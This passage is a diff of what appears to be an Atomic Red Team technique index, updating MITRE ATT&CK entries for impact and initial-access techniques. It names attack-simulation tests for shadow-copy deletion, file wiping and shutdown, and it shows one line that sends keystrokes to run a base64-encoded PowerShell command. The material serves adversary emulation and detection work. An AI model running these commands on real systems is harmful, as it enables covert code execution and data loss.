+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -95451,7 +96412,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -95468,8 +96429,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -95488,99 +96452,73 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests: []
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -95589,7 +96527,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -95615,9 +96553,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -95673,7 +96612,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests:
     - name: Windows - Overwrite file with SysInternals SDelete
@@ -95725,50 +96663,7 @@ impact:
         name: command_prompt
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -95783,6 +96678,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
         service, but such response time typically requires very aggressive monitoring
@@ -95795,16 +96694,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -95872,11 +96807,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -95894,7 +96828,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -95921,7 +96855,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -95971,13 +96905,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests:
     - name: Windows - Delete Volume Shadow Copies
@@ -96246,11 +97179,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -96315,7 +97247,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests:
     - name: Shutdown System - Windows
@@ -96461,7 +97392,7 @@ impact:
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -96539,7 +97470,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests:
     - name: Running Chrome VPN Extensions via the Registry 2 vpn extension
@@ -96635,11 +97565,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -96678,10 +97607,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -96698,7 +97627,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -96737,7 +97666,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests:
     - name: Paste and run technique
@@ -96784,7 +97712,7 @@ initial-access:
           [System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec " + [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('#{execution_command}')) + "{ENTER}")
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -96846,7 +97774,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -96863,7 +97791,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests:
     - name: Download Macro-Enabled Phishing Attachment
@@ -96954,7 +97881,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -96968,7 +97895,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -97031,7 +97957,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests:
     - name: USB Malware Spread Simulation
@@ -97058,7 +97983,7 @@ initial-access:
           }
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -97133,7 +98058,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -97147,7 +98072,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests:
     - name: Octopus Scanner Malware Open Source Supply Chain
@@ -97185,14 +98109,14 @@ initial-access:
         name: command_prompt
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
